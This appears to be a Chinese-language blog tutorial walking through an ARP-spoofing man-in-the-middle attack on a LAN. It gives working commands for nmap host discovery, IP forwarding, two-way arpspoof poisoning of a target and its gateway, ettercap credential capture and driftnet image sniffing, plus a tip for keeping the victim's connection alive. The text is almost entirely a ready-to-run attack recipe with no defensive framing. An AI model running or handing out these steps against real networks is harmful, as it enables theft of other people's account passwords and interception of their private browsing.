先用nmap找到目标(或zenmap等等)
nmap -sP 192.168.0.1-200
192.168.0.105 //(主机A 我自己的电脑)
echo 1 > /proc/sys/net/ipv4/ip_forward //进行IP转发(echo 0即断网)
arpspoof -i <<span class="hljs-name">网卡名>
-t <<span class="hljs-name">欺骗的目标> <<span class="hljs-name">我是谁>
【
arpspoof -i eth0 -t 192.168.0.105 192.168.0.1
// 终端1, 欺骗主机A :我是网关
arpspoof -i eth0 -t 192.168.0.1 192.168.0.105
//终端2, 欺骗网关:我是主机 A
】
用 ettercap抓取账号密码
打开一个新终端
ettercap -Tq -i eth0
用driftnet获取目标主机的图片浏览记录
driftnet -i eth0
(eth0为我的笔记本内置网卡名称 USB网卡名称一般为wlan0)
扫描二维码关注公众号,回复:
3990387 查看本文章
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.0.105 192.168.0.1
欺骗时仍造成断网。
解决办法。把靶机ip和网关反一下。
通过欺骗网关可以拿到图片,至于账号密码能不能拿到要看登陆的网站了。